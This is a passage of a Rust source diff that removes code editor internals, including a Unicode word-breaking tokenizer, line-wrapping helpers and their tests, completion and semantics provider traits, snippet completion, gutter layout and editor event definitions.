-struct WordBreakingTokenizer<'a> { - input: &'a str, -} - -impl<'a> WordBreakingTokenizer<'a> { - fn new(input: &'a str) -> Self { - Self { input } - } -} - -fn is_char_ideographic(ch: char) -> bool { - use unicode_script::Script::*; - use unicode_script::UnicodeScript; - matches!(ch.script(), Han | Tangut | Yi) -} - -fn is_grapheme_ideographic(text: &str) -> bool { - text.chars().any(is_char_ideographic) -} - -fn is_grapheme_whitespace(text: &str) -> bool { - text.chars().any(|x| x.is_whitespace()) -} - -fn should_stay_with_preceding_ideograph(text: &str) -> bool { - text.chars().next().map_or(false, |ch| { - matches!(ch, '。' | '、' | ',' | '?' | '!' | ':' | ';' | '…') - }) -} - -#[derive(PartialEq, Eq, Debug, Clone, Copy)] -enum WordBreakToken<'a> { - Word { token: &'a str, grapheme_len: usize }, - InlineWhitespace { token: &'a str, grapheme_len: usize }, - Newline, -} - -impl<'a> Iterator for WordBreakingTokenizer<'a> { - /// Yields a span, the count of graphemes in the token, and whether it was - /// whitespace. Note that it also breaks at word boundaries. 
- type Item = WordBreakToken<'a>; - - fn next(&mut self) -> Option { - use unicode_segmentation::UnicodeSegmentation; - if self.input.is_empty() { - return None; - } - - let mut iter = self.input.graphemes(true).peekable(); - let mut offset = 0; - let mut grapheme_len = 0; - if let Some(first_grapheme) = iter.next() { - let is_newline = first_grapheme == "\n"; - let is_whitespace = is_grapheme_whitespace(first_grapheme); - offset += first_grapheme.len(); - grapheme_len += 1; - if is_grapheme_ideographic(first_grapheme) && !is_whitespace { - if let Some(grapheme) = iter.peek().copied() { - if should_stay_with_preceding_ideograph(grapheme) { - offset += grapheme.len(); - grapheme_len += 1; - } - } - } else { - let mut words = self.input[offset..].split_word_bound_indices().peekable(); - let mut next_word_bound = words.peek().copied(); - if next_word_bound.map_or(false, |(i, _)| i == 0) { - next_word_bound = words.next(); - } - while let Some(grapheme) = iter.peek().copied() { - if next_word_bound.map_or(false, |(i, _)| i == offset) { - break; - }; - if is_grapheme_whitespace(grapheme) != is_whitespace - || (grapheme == "\n") != is_newline - { - break; - }; - offset += grapheme.len(); - grapheme_len += 1; - iter.next(); - } - } - let token = &self.input[..offset]; - self.input = &self.input[offset..]; - if token == "\n" { - Some(WordBreakToken::Newline) - } else if is_whitespace { - Some(WordBreakToken::InlineWhitespace { - token, - grapheme_len, - }) - } else { - Some(WordBreakToken::Word { - token, - grapheme_len, - }) - } - } else { - None - } - } -} - -#[test] -fn test_word_breaking_tokenizer() { - let tests: &[(&str, &[WordBreakToken<'static>])] = &[ - ("", &[]), - (" ", &[whitespace(" ", 2)]), - ("Ʒ", &[word("Ʒ", 1)]), - ("Ǽ", &[word("Ǽ", 1)]), - ("⋑", &[word("⋑", 1)]), - ("⋑⋑", &[word("⋑⋑", 2)]), - ( - "原理,进而", - &[word("原", 1), word("理,", 2), word("进", 1), word("而", 1)], - ), - ( - "hello world", - &[word("hello", 5), whitespace(" ", 1), word("world", 5)], - 
), - ( - "hello, world", - &[word("hello,", 6), whitespace(" ", 1), word("world", 5)], - ), - ( - " hello world", - &[ - whitespace(" ", 2), - word("hello", 5), - whitespace(" ", 1), - word("world", 5), - ], - ), - ( - "这是什么 \n 钢笔", - &[ - word("这", 1), - word("是", 1), - word("什", 1), - word("么", 1), - whitespace(" ", 1), - newline(), - whitespace(" ", 1), - word("钢", 1), - word("笔", 1), - ], - ), - (" mutton", &[whitespace(" ", 1), word("mutton", 6)]), - ]; - - fn word(token: &'static str, grapheme_len: usize) -> WordBreakToken<'static> { - WordBreakToken::Word { - token, - grapheme_len, - } - } - - fn whitespace(token: &'static str, grapheme_len: usize) -> WordBreakToken<'static> { - WordBreakToken::InlineWhitespace { - token, - grapheme_len, - } - } - - fn newline() -> WordBreakToken<'static> { - WordBreakToken::Newline - } - - for (input, result) in tests { - assert_eq!( - WordBreakingTokenizer::new(input) - .collect::>() - .as_slice(), - *result, - ); - } -} - -fn wrap_with_prefix( - line_prefix: String, - unwrapped_text: String, - wrap_column: usize, - tab_size: NonZeroU32, - preserve_existing_whitespace: bool, -) -> String { - let line_prefix_len = char_len_with_expanded_tabs(0, &line_prefix, tab_size); - let mut wrapped_text = String::new(); - let mut current_line = line_prefix.clone(); - - let tokenizer = WordBreakingTokenizer::new(&unwrapped_text); - let mut current_line_len = line_prefix_len; - let mut in_whitespace = false; - for token in tokenizer { - let have_preceding_whitespace = in_whitespace; - match token { - WordBreakToken::Word { - token, - grapheme_len, - } => { - in_whitespace = false; - if current_line_len + grapheme_len > wrap_column - && current_line_len != line_prefix_len - { - wrapped_text.push_str(current_line.trim_end()); - wrapped_text.push('\n'); - current_line.truncate(line_prefix.len()); - current_line_len = line_prefix_len; - } - current_line.push_str(token); - current_line_len += grapheme_len; - } - 
WordBreakToken::InlineWhitespace { - mut token, - mut grapheme_len, - } => { - in_whitespace = true; - if have_preceding_whitespace && !preserve_existing_whitespace { - continue; - } - if !preserve_existing_whitespace { - token = " "; - grapheme_len = 1; - } - if current_line_len + grapheme_len > wrap_column { - wrapped_text.push_str(current_line.trim_end()); - wrapped_text.push('\n'); - current_line.truncate(line_prefix.len()); - current_line_len = line_prefix_len; - } else if current_line_len != line_prefix_len || preserve_existing_whitespace { - current_line.push_str(token); - current_line_len += grapheme_len; - } - } - WordBreakToken::Newline => { - in_whitespace = true; - if preserve_existing_whitespace { - wrapped_text.push_str(current_line.trim_end()); - wrapped_text.push('\n'); - current_line.truncate(line_prefix.len()); - current_line_len = line_prefix_len; - } else if have_preceding_whitespace { - continue; - } else if current_line_len + 1 > wrap_column && current_line_len != line_prefix_len - { - wrapped_text.push_str(current_line.trim_end()); - wrapped_text.push('\n'); - current_line.truncate(line_prefix.len()); - current_line_len = line_prefix_len; - } else if current_line_len != line_prefix_len { - current_line.push(' '); - current_line_len += 1; - } - } - } - } - - if !current_line.is_empty() { - wrapped_text.push_str(¤t_line); - } - wrapped_text -} - -#[test] -fn test_wrap_with_prefix() { - assert_eq!( - wrap_with_prefix( - "# ".to_string(), - "abcdefg".to_string(), - 4, - NonZeroU32::new(4).unwrap(), - false, - ), - "# abcdefg" - ); - assert_eq!( - wrap_with_prefix( - "".to_string(), - "\thello world".to_string(), - 8, - NonZeroU32::new(4).unwrap(), - false, - ), - "hello\nworld" - ); - assert_eq!( - wrap_with_prefix( - "// ".to_string(), - "xx \nyy zz aa bb cc".to_string(), - 12, - NonZeroU32::new(4).unwrap(), - false, - ), - "// xx yy zz\n// aa bb cc" - ); - assert_eq!( - wrap_with_prefix( - String::new(), - "这是什么 \n 钢笔".to_string(), - 3, - 
NonZeroU32::new(4).unwrap(), - false, - ), - "这是什\n么 钢\n笔" - ); -} - -pub trait CollaborationHub { - fn collaborators<'a>(&self, cx: &'a App) -> &'a HashMap; - fn user_participant_indices<'a>(&self, cx: &'a App) -> &'a HashMap; - fn user_names(&self, cx: &App) -> HashMap; -} - -impl CollaborationHub for Entity { - fn collaborators<'a>(&self, cx: &'a App) -> &'a HashMap { - self.read(cx).collaborators() - } - - fn user_participant_indices<'a>(&self, cx: &'a App) -> &'a HashMap { - self.read(cx).user_store().read(cx).participant_indices() - } - - fn user_names(&self, cx: &App) -> HashMap { - let this = self.read(cx); - let user_ids = this.collaborators().values().map(|c| c.user_id); - this.user_store().read_with(cx, |user_store, cx| { - user_store.participant_names(user_ids, cx) - }) - } -} - -pub trait SemanticsProvider { - fn hover( - &self, - buffer: &Entity, - position: text::Anchor, - cx: &mut App, - ) -> Option>>; - - fn inline_values( - &self, - buffer_handle: Entity, - range: Range, - cx: &mut App, - ) -> Option>>>; - - fn inlay_hints( - &self, - buffer_handle: Entity, - range: Range, - cx: &mut App, - ) -> Option>>>; - - fn resolve_inlay_hint( - &self, - hint: InlayHint, - buffer_handle: Entity, - server_id: LanguageServerId, - cx: &mut App, - ) -> Option>>; - - fn supports_inlay_hints(&self, buffer: &Entity, cx: &mut App) -> bool; - - fn document_highlights( - &self, - buffer: &Entity, - position: text::Anchor, - cx: &mut App, - ) -> Option>>>; - - fn definitions( - &self, - buffer: &Entity, - position: text::Anchor, - kind: GotoDefinitionKind, - cx: &mut App, - ) -> Option>>>; - - fn range_for_rename( - &self, - buffer: &Entity, - position: text::Anchor, - cx: &mut App, - ) -> Option>>>>; - - fn perform_rename( - &self, - buffer: &Entity, - position: text::Anchor, - new_name: String, - cx: &mut App, - ) -> Option>>; -} - -pub trait CompletionProvider { - fn completions( - &self, - excerpt_id: ExcerptId, - buffer: &Entity, - buffer_position: text::Anchor, - 
trigger: CompletionContext, - window: &mut Window, - cx: &mut Context, - ) -> Task>>>; - - fn resolve_completions( - &self, - buffer: Entity, - completion_indices: Vec, - completions: Rc>>, - cx: &mut Context, - ) -> Task>; - - fn apply_additional_edits_for_completion( - &self, - _buffer: Entity, - _completions: Rc>>, - _completion_index: usize, - _push_to_history: bool, - _cx: &mut Context, - ) -> Task>> { - Task::ready(Ok(None)) - } - - fn is_completion_trigger( - &self, - buffer: &Entity, - position: language::Anchor, - text: &str, - trigger_in_words: bool, - cx: &mut Context, - ) -> bool; - - fn sort_completions(&self) -> bool { - true - } - - fn filter_completions(&self) -> bool { - true - } -} - -pub trait CodeActionProvider { - fn id(&self) -> Arc; - - fn code_actions( - &self, - buffer: &Entity, - range: Range, - window: &mut Window, - cx: &mut App, - ) -> Task>>; - - fn apply_code_action( - &self, - buffer_handle: Entity, - action: CodeAction, - excerpt_id: ExcerptId, - push_to_history: bool, - window: &mut Window, - cx: &mut App, - ) -> Task>; -} - -impl CodeActionProvider for Entity { - fn id(&self) -> Arc { - "project".into() - } - - fn code_actions( - &self, - buffer: &Entity, - range: Range, - _window: &mut Window, - cx: &mut App, - ) -> Task>> { - self.update(cx, |project, cx| { - let code_lens = project.code_lens(buffer, range.clone(), cx); - let code_actions = project.code_actions(buffer, range, None, cx); - cx.background_spawn(async move { - let (code_lens, code_actions) = join(code_lens, code_actions).await; - Ok(code_lens - .context("code lens fetch")? - .into_iter() - .chain(code_actions.context("code action fetch")?) 
- .collect()) - }) - }) - } - - fn apply_code_action( - &self, - buffer_handle: Entity, - action: CodeAction, - _excerpt_id: ExcerptId, - push_to_history: bool, - _window: &mut Window, - cx: &mut App, - ) -> Task> { - self.update(cx, |project, cx| { - project.apply_code_action(buffer_handle, action, push_to_history, cx) - }) - } -} - -fn snippet_completions( - project: &Project, - buffer: &Entity, - buffer_position: text::Anchor, - cx: &mut App, -) -> Task>> { - let languages = buffer.read(cx).languages_at(buffer_position); - let snippet_store = project.snippets().read(cx); - - let scopes: Vec<_> = languages - .iter() - .filter_map(|language| { - let language_name = language.lsp_id(); - let snippets = snippet_store.snippets_for(Some(language_name), cx); - - if snippets.is_empty() { - None - } else { - Some((language.default_scope(), snippets)) - } - }) - .collect(); - - if scopes.is_empty() { - return Task::ready(Ok(vec![])); - } - - let snapshot = buffer.read(cx).text_snapshot(); - let chars: String = snapshot - .reversed_chars_for_range(text::Anchor::MIN..buffer_position) - .collect(); - let executor = cx.background_executor().clone(); - - cx.background_spawn(async move { - let mut all_results: Vec = Vec::new(); - for (scope, snippets) in scopes.into_iter() { - let classifier = CharClassifier::new(Some(scope)).for_completion(true); - let mut last_word = chars - .chars() - .take_while(|c| classifier.is_word(*c)) - .collect::(); - last_word = last_word.chars().rev().collect(); - - if last_word.is_empty() { - return Ok(vec![]); - } - - let as_offset = text::ToOffset::to_offset(&buffer_position, &snapshot); - let to_lsp = |point: &text::Anchor| { - let end = text::ToPointUtf16::to_point_utf16(point, &snapshot); - point_to_lsp(end) - }; - let lsp_end = to_lsp(&buffer_position); - - let candidates = snippets - .iter() - .enumerate() - .flat_map(|(ix, snippet)| { - snippet - .prefix - .iter() - .map(move |prefix| StringMatchCandidate::new(ix, &prefix)) - }) - 
.collect::>(); - - let mut matches = fuzzy::match_strings( - &candidates, - &last_word, - last_word.chars().any(|c| c.is_uppercase()), - 100, - &Default::default(), - executor.clone(), - ) - .await; - - // Remove all candidates where the query's start does not match the start of any word in the candidate - if let Some(query_start) = last_word.chars().next() { - matches.retain(|string_match| { - split_words(&string_match.string).any(|word| { - // Check that the first codepoint of the word as lowercase matches the first - // codepoint of the query as lowercase - word.chars() - .flat_map(|codepoint| codepoint.to_lowercase()) - .zip(query_start.to_lowercase()) - .all(|(word_cp, query_cp)| word_cp == query_cp) - }) - }); - } - - let matched_strings = matches - .into_iter() - .map(|m| m.string) - .collect::>(); - - let mut result: Vec = snippets - .iter() - .filter_map(|snippet| { - let matching_prefix = snippet - .prefix - .iter() - .find(|prefix| matched_strings.contains(*prefix))?; - let start = as_offset - last_word.len(); - let start = snapshot.anchor_before(start); - let range = start..buffer_position; - let lsp_start = to_lsp(&start); - let lsp_range = lsp::Range { - start: lsp_start, - end: lsp_end, - }; - Some(Completion { - replace_range: range, - new_text: snippet.body.clone(), - source: CompletionSource::Lsp { - insert_range: None, - server_id: LanguageServerId(usize::MAX), - resolved: true, - lsp_completion: Box::new(lsp::CompletionItem { - label: snippet.prefix.first().unwrap().clone(), - kind: Some(CompletionItemKind::SNIPPET), - label_details: snippet.description.as_ref().map(|description| { - lsp::CompletionItemLabelDetails { - detail: Some(description.clone()), - description: None, - } - }), - insert_text_format: Some(InsertTextFormat::SNIPPET), - text_edit: Some(lsp::CompletionTextEdit::InsertAndReplace( - lsp::InsertReplaceEdit { - new_text: snippet.body.clone(), - insert: lsp_range, - replace: lsp_range, - }, - )), - filter_text: 
Some(snippet.body.clone()), - sort_text: Some(char::MAX.to_string()), - ..lsp::CompletionItem::default() - }), - lsp_defaults: None, - }, - label: CodeLabel { - text: matching_prefix.clone(), - runs: Vec::new(), - filter_range: 0..matching_prefix.len(), - }, - icon_path: None, - documentation: snippet.description.clone().map(|description| { - CompletionDocumentation::SingleLine(description.into()) - }), - insert_text_mode: None, - confirm: None, - }) - }) - .collect(); - - all_results.append(&mut result); - } - - Ok(all_results) - }) -} - -impl CompletionProvider for Entity { - fn completions( - &self, - _excerpt_id: ExcerptId, - buffer: &Entity, - buffer_position: text::Anchor, - options: CompletionContext, - _window: &mut Window, - cx: &mut Context, - ) -> Task>>> { - self.update(cx, |project, cx| { - let snippets = snippet_completions(project, buffer, buffer_position, cx); - let project_completions = project.completions(buffer, buffer_position, options, cx); - cx.background_spawn(async move { - let snippets_completions = snippets.await?; - match project_completions.await? 
{ - Some(mut completions) => { - completions.extend(snippets_completions); - Ok(Some(completions)) - } - None => { - if snippets_completions.is_empty() { - Ok(None) - } else { - Ok(Some(snippets_completions)) - } - } - } - }) - }) - } - - fn resolve_completions( - &self, - buffer: Entity, - completion_indices: Vec, - completions: Rc>>, - cx: &mut Context, - ) -> Task> { - self.update(cx, |project, cx| { - project.lsp_store().update(cx, |lsp_store, cx| { - lsp_store.resolve_completions(buffer, completion_indices, completions, cx) - }) - }) - } - - fn apply_additional_edits_for_completion( - &self, - buffer: Entity, - completions: Rc>>, - completion_index: usize, - push_to_history: bool, - cx: &mut Context, - ) -> Task>> { - self.update(cx, |project, cx| { - project.lsp_store().update(cx, |lsp_store, cx| { - lsp_store.apply_additional_edits_for_completion( - buffer, - completions, - completion_index, - push_to_history, - cx, - ) - }) - }) - } - - fn is_completion_trigger( - &self, - buffer: &Entity, - position: language::Anchor, - text: &str, - trigger_in_words: bool, - cx: &mut Context, - ) -> bool { - let mut chars = text.chars(); - let char = if let Some(char) = chars.next() { - char - } else { - return false; - }; - if chars.next().is_some() { - return false; - } - - let buffer = buffer.read(cx); - let snapshot = buffer.snapshot(); - if !snapshot.settings_at(position, cx).show_completions_on_input { - return false; - } - let classifier = snapshot.char_classifier_at(position).for_completion(true); - if trigger_in_words && classifier.is_word(char) { - return true; - } - - buffer.completion_triggers().contains(text) - } -} - -impl SemanticsProvider for Entity { - fn hover( - &self, - buffer: &Entity, - position: text::Anchor, - cx: &mut App, - ) -> Option>> { - Some(self.update(cx, |project, cx| project.hover(buffer, position, cx))) - } - - fn document_highlights( - &self, - buffer: &Entity, - position: text::Anchor, - cx: &mut App, - ) -> Option>>> { - 
Some(self.update(cx, |project, cx| { - project.document_highlights(buffer, position, cx) - })) - } - - fn definitions( - &self, - buffer: &Entity, - position: text::Anchor, - kind: GotoDefinitionKind, - cx: &mut App, - ) -> Option>>> { - Some(self.update(cx, |project, cx| match kind { - GotoDefinitionKind::Symbol => project.definition(&buffer, position, cx), - GotoDefinitionKind::Declaration => project.declaration(&buffer, position, cx), - GotoDefinitionKind::Type => project.type_definition(&buffer, position, cx), - GotoDefinitionKind::Implementation => project.implementation(&buffer, position, cx), - })) - } - - fn supports_inlay_hints(&self, buffer: &Entity, cx: &mut App) -> bool { - // TODO: make this work for remote projects - self.update(cx, |project, cx| { - if project - .active_debug_session(cx) - .is_some_and(|(session, _)| session.read(cx).any_stopped_thread()) - { - return true; - } - - buffer.update(cx, |buffer, cx| { - project.any_language_server_supports_inlay_hints(buffer, cx) - }) - }) - } - - fn inline_values( - &self, - buffer_handle: Entity, - range: Range, - cx: &mut App, - ) -> Option>>> { - self.update(cx, |project, cx| { - let (session, active_stack_frame) = project.active_debug_session(cx)?; - - Some(project.inline_values(session, active_stack_frame, buffer_handle, range, cx)) - }) - } - - fn inlay_hints( - &self, - buffer_handle: Entity, - range: Range, - cx: &mut App, - ) -> Option>>> { - Some(self.update(cx, |project, cx| { - project.inlay_hints(buffer_handle, range, cx) - })) - } - - fn resolve_inlay_hint( - &self, - hint: InlayHint, - buffer_handle: Entity, - server_id: LanguageServerId, - cx: &mut App, - ) -> Option>> { - Some(self.update(cx, |project, cx| { - project.resolve_inlay_hint(hint, buffer_handle, server_id, cx) - })) - } - - fn range_for_rename( - &self, - buffer: &Entity, - position: text::Anchor, - cx: &mut App, - ) -> Option>>>> { - Some(self.update(cx, |project, cx| { - let buffer = buffer.clone(); - let task = 
project.prepare_rename(buffer.clone(), position, cx); - cx.spawn(async move |_, cx| { - Ok(match task.await? { - PrepareRenameResponse::Success(range) => Some(range), - PrepareRenameResponse::InvalidPosition => None, - PrepareRenameResponse::OnlyUnpreparedRenameSupported => { - // Fallback on using TreeSitter info to determine identifier range - buffer.update(cx, |buffer, _| { - let snapshot = buffer.snapshot(); - let (range, kind) = snapshot.surrounding_word(position); - if kind != Some(CharKind::Word) { - return None; - } - Some( - snapshot.anchor_before(range.start) - ..snapshot.anchor_after(range.end), - ) - })? - } - }) - }) - })) - } - - fn perform_rename( - &self, - buffer: &Entity, - position: text::Anchor, - new_name: String, - cx: &mut App, - ) -> Option>> { - Some(self.update(cx, |project, cx| { - project.perform_rename(buffer.clone(), position, new_name, cx) - })) - } -} - -fn inlay_hint_settings( - location: Anchor, - snapshot: &MultiBufferSnapshot, - cx: &mut Context, -) -> InlayHintSettings { - let file = snapshot.file_at(location); - let language = snapshot.language_at(location).map(|l| l.name()); - language_settings(cx).language(language).file(file).get().inlay_hints -} - -fn consume_contiguous_rows( - contiguous_row_selections: &mut Vec>, - selection: &Selection, - display_map: &DisplaySnapshot, - selections: &mut Peekable>>, -) -> (MultiBufferRow, MultiBufferRow) { - contiguous_row_selections.push(selection.clone()); - let start_row = MultiBufferRow(selection.start.row); - let mut end_row = ending_row(selection, display_map); - - while let Some(next_selection) = selections.peek() { - if next_selection.start.row <= end_row.0 { - end_row = ending_row(next_selection, display_map); - contiguous_row_selections.push(selections.next().unwrap().clone()); - } else { - break; - } - } - (start_row, end_row) -} - -fn ending_row(next_selection: &Selection, display_map: &DisplaySnapshot) -> MultiBufferRow { - if next_selection.end.column > 0 || 
next_selection.is_empty() { - MultiBufferRow(display_map.next_line_boundary(next_selection.end).0.row + 1) - } else { - MultiBufferRow(next_selection.end.row) - } -} - -impl EditorSnapshot { - pub fn remote_selections_in_range<'a>( - &'a self, - range: &'a Range, - collaboration_hub: &dyn CollaborationHub, - cx: &'a App, - ) -> impl 'a + Iterator { - let participant_names = collaboration_hub.user_names(cx); - let participant_indices = collaboration_hub.user_participant_indices(cx); - let collaborators_by_peer_id = collaboration_hub.collaborators(cx); - let collaborators_by_replica_id = collaborators_by_peer_id - .iter() - .map(|(_, collaborator)| (collaborator.replica_id, collaborator)) - .collect::>(); - self.buffer_snapshot - .selections_in_range(range, false) - .filter_map(move |(replica_id, line_mode, cursor_shape, selection)| { - let collaborator = collaborators_by_replica_id.get(&replica_id)?; - let participant_index = participant_indices.get(&collaborator.user_id).copied(); - let user_name = participant_names.get(&collaborator.user_id).cloned(); - Some(RemoteSelection { - replica_id, - selection, - cursor_shape, - line_mode, - participant_index, - peer_id: collaborator.peer_id, - user_name, - }) - }) - } - - pub fn hunks_for_ranges( - &self, - ranges: impl IntoIterator>, - ) -> Vec { - let mut hunks = Vec::new(); - let mut processed_buffer_rows: HashMap>> = - HashMap::default(); - for query_range in ranges { - let query_rows = - MultiBufferRow(query_range.start.row)..MultiBufferRow(query_range.end.row + 1); - for hunk in self.buffer_snapshot.diff_hunks_in_range( - Point::new(query_rows.start.0, 0)..Point::new(query_rows.end.0, 0), - ) { - // Include deleted hunks that are adjacent to the query range, because - // otherwise they would be missed. 
- let mut intersects_range = hunk.row_range.overlaps(&query_rows); - if hunk.status().is_deleted() { - intersects_range |= hunk.row_range.start == query_rows.end; - intersects_range |= hunk.row_range.end == query_rows.start; - } - if intersects_range { - if !processed_buffer_rows - .entry(hunk.buffer_id) - .or_default() - .insert(hunk.buffer_range.start..hunk.buffer_range.end) - { - continue; - } - hunks.push(hunk); - } - } - } - - hunks - } - - fn display_diff_hunks_for_rows<'a>( - &'a self, - display_rows: Range, - folded_buffers: &'a HashSet, - ) -> impl 'a + Iterator { - let buffer_start = DisplayPoint::new(display_rows.start, 0).to_point(self); - let buffer_end = DisplayPoint::new(display_rows.end, 0).to_point(self); - - self.buffer_snapshot - .diff_hunks_in_range(buffer_start..buffer_end) - .filter_map(|hunk| { - if folded_buffers.contains(&hunk.buffer_id) { - return None; - } - - let hunk_start_point = Point::new(hunk.row_range.start.0, 0); - let hunk_end_point = Point::new(hunk.row_range.end.0, 0); - - let hunk_display_start = self.point_to_display_point(hunk_start_point, Bias::Left); - let hunk_display_end = self.point_to_display_point(hunk_end_point, Bias::Right); - - let display_hunk = if hunk_display_start.column() != 0 { - DisplayDiffHunk::Folded { - display_row: hunk_display_start.row(), - } - } else { - let mut end_row = hunk_display_end.row(); - if hunk_display_end.column() > 0 { - end_row.0 += 1; - } - let is_created_file = hunk.is_created_file(); - DisplayDiffHunk::Unfolded { - status: hunk.status(), - diff_base_byte_range: hunk.diff_base_byte_range, - display_row_range: hunk_display_start.row()..end_row, - multi_buffer_range: Anchor::range_in_buffer( - hunk.excerpt_id, - hunk.buffer_id, - hunk.buffer_range, - ), - is_created_file, - } - }; - - Some(display_hunk) - }) - } - - pub fn language_at(&self, position: T) -> Option<&Arc> { - self.display_snapshot.buffer_snapshot.language_at(position) - } - - pub fn is_focused(&self) -> bool { - 
self.is_focused - } - - pub fn placeholder_text(&self) -> Option<&Arc> { - self.placeholder_text.as_ref() - } - - pub fn scroll_position(&self) -> gpui::Point { - self.scroll_anchor.scroll_position(&self.display_snapshot) - } - - fn gutter_dimensions( - &self, - font_id: FontId, - font_size: Pixels, - max_line_number_width: Pixels, - cx: &App, - ) -> Option { - if !self.show_gutter { - return None; - } - - let descent = cx.text_system().descent(font_id, font_size); - let em_width = cx.text_system().em_width(font_id, font_size).log_err()?; - let em_advance = cx.text_system().em_advance(font_id, font_size).log_err()?; - - let show_git_gutter = self.show_git_diff_gutter.unwrap_or_else(|| { - matches!( - ProjectSettings::get_global(cx).git.git_gutter, - Some(GitGutterSetting::TrackedFiles) - ) - }); - let gutter_settings = EditorSettings::get_global(cx).gutter; - let show_line_numbers = self - .show_line_numbers - .unwrap_or(gutter_settings.line_numbers); - let line_gutter_width = if show_line_numbers { - // Avoid flicker-like gutter resizes when the line number gains another digit and only resize the gutter on files with N*10^5 lines. - let min_width_for_number_on_gutter = em_advance * MIN_LINE_NUMBER_DIGITS as f32; - max_line_number_width.max(min_width_for_number_on_gutter) - } else { - 0.0.into() - }; - - let show_code_actions = self - .show_code_actions - .unwrap_or(gutter_settings.code_actions); - - let show_runnables = self.show_runnables.unwrap_or(gutter_settings.runnables); - let show_breakpoints = self.show_breakpoints.unwrap_or(gutter_settings.breakpoints); - - let git_blame_entries_width = - self.git_blame_gutter_max_author_length - .map(|max_author_length| { - let renderer = cx.global::().0.clone(); - const MAX_RELATIVE_TIMESTAMP: &str = "60 minutes ago"; - - /// The number of characters to dedicate to gaps and margins. 
- const SPACING_WIDTH: usize = 4; - - let max_char_count = max_author_length.min(renderer.max_author_length()) - + ::git::SHORT_SHA_LENGTH - + MAX_RELATIVE_TIMESTAMP.len() - + SPACING_WIDTH; - - em_advance * max_char_count - }); - - let is_singleton = self.buffer_snapshot.is_singleton(); - - let mut left_padding = git_blame_entries_width.unwrap_or(Pixels::ZERO); - left_padding += if !is_singleton { - em_width * 4.0 - } else if show_code_actions || show_runnables || show_breakpoints { - em_width * 3.0 - } else if show_git_gutter && show_line_numbers { - em_width * 2.0 - } else if show_git_gutter || show_line_numbers { - em_width - } else { - px(0.) - }; - - let shows_folds = is_singleton && gutter_settings.folds; - - let right_padding = if shows_folds && show_line_numbers { - em_width * 4.0 - } else if shows_folds || (!is_singleton && show_line_numbers) { - em_width * 3.0 - } else if show_line_numbers { - em_width - } else { - px(0.) - }; - - Some(GutterDimensions { - left_padding, - right_padding, - width: line_gutter_width + left_padding + right_padding, - margin: -descent, - git_blame_entries_width, - }) - } - - pub fn render_crease_toggle( - &self, - buffer_row: MultiBufferRow, - row_contains_cursor: bool, - editor: Entity, - window: &mut Window, - cx: &mut App, - ) -> Option { - let folded = self.is_line_folded(buffer_row); - let mut is_foldable = false; - - if let Some(crease) = self - .crease_snapshot - .query_row(buffer_row, &self.buffer_snapshot) - { - is_foldable = true; - match crease { - Crease::Inline { render_toggle, .. } | Crease::Block { render_toggle, .. 
} => { - if let Some(render_toggle) = render_toggle { - let toggle_callback = - Arc::new(move |folded, window: &mut Window, cx: &mut App| { - if folded { - editor.update(cx, |editor, cx| { - editor.fold_at(buffer_row, window, cx) - }); - } else { - editor.update(cx, |editor, cx| { - editor.unfold_at(buffer_row, window, cx) - }); - } - }); - return Some((render_toggle)( - buffer_row, - folded, - toggle_callback, - window, - cx, - )); - } - } - } - } - - is_foldable |= self.starts_indent(buffer_row); - - if folded || (is_foldable && (row_contains_cursor || self.gutter_hovered)) { - Some( - Disclosure::new(("gutter_crease", buffer_row.0), !folded) - .toggle_state(folded) - .on_click(window.listener_for(&editor, move |this, _e, window, cx| { - if folded { - this.unfold_at(buffer_row, window, cx); - } else { - this.fold_at(buffer_row, window, cx); - } - })) - .into_any_element(), - ) - } else { - None - } - } - - pub fn render_crease_trailer( - &self, - buffer_row: MultiBufferRow, - window: &mut Window, - cx: &mut App, - ) -> Option { - let folded = self.is_line_folded(buffer_row); - if let Crease::Inline { render_trailer, .. } = self - .crease_snapshot - .query_row(buffer_row, &self.buffer_snapshot)? 
- { - let render_trailer = render_trailer.as_ref()?; - Some(render_trailer(buffer_row, folded, window, cx)) - } else { - None - } - } -} - -impl Deref for EditorSnapshot { - type Target = DisplaySnapshot; - - fn deref(&self) -> &Self::Target { - &self.display_snapshot - } -} - -#[derive(Clone, Debug, PartialEq, Eq)] -pub enum EditorEvent { - InputIgnored { - text: Arc, - }, - InputHandled { - utf16_range_to_replace: Option>, - text: Arc, - }, - ExcerptsAdded { - buffer: Entity, - predecessor: ExcerptId, - excerpts: Vec<(ExcerptId, ExcerptRange)>, - }, - ExcerptsRemoved { - ids: Vec, - removed_buffer_ids: Vec, - }, - BufferFoldToggled { - ids: Vec, - folded: bool, - }, - ExcerptsEdited { - ids: Vec, - }, - ExcerptsExpanded { - ids: Vec, - }, - BufferEdited, - Edited { - transaction_id: clock::Lamport, - }, - Reparsed(BufferId), - Focused, - FocusedIn, - Blurred, - DirtyChanged, - Saved, - TitleChanged, - DiffBaseChanged, - SelectionsChanged { - local: bool, - }, - ScrollPositionChanged { - local: bool, - autoscroll: bool, - }, - Closed, - TransactionUndone { - transaction_id: clock::Lamport, - }, - TransactionBegun { - transaction_id: clock::Lamport, - }, - Reloaded, - CursorShapeChanged, - PushedToNavHistory { - anchor: Anchor, - is_deactivate: bool, - }, -} - -impl EventEmitter for Editor {} - -impl Focusable for Editor { - fn focus_handle(&self, _cx: &App) -> FocusHandle { - self.focus_handle.clone() - } -} - -impl Render for Editor { - fn render(&mut self, _: &mut Window, cx: &mut Context) -> impl IntoElement { - let settings = ThemeSettings::get_global(cx); - - let mut text_style = match self.mode { - EditorMode::SingleLine { .. } | EditorMode::AutoHeight { .. 
} => TextStyle { - color: cx.theme().colors().editor_foreground, - font_family: settings.ui_font.family.clone(), - font_features: settings.ui_font.features.clone(), - font_fallbacks: settings.ui_font.fallbacks.clone(), - font_size: rems(0.875).into(), - font_weight: settings.ui_font.weight, - line_height: relative(settings.buffer_line_height.value()), - ..Default::default() - }, - EditorMode::Full { .. } => TextStyle { - color: cx.theme().colors().editor_foreground, - font_family: settings.buffer_font.family.clone(), - font_features: settings.buffer_font.features.clone(), - font_fallbacks: settings.buffer_font.fallbacks.clone(), - font_size: settings.buffer_font_size(cx).into(), - font_weight: settings.buffer_font.weight, - line_height: relative(settings.buffer_line_height.value()), - ..Default::default() - }, - }; - if let Some(text_style_refinement) = &self.text_style_refinement { - text_style.refine(text_style_refinement) - } - - let background = match self.mode { - EditorMode::SingleLine { .. } => cx.theme().system().transparent, - EditorMode::AutoHeight { max_lines: _ } => cx.theme().system().transparent, - EditorMode::Full { .. 
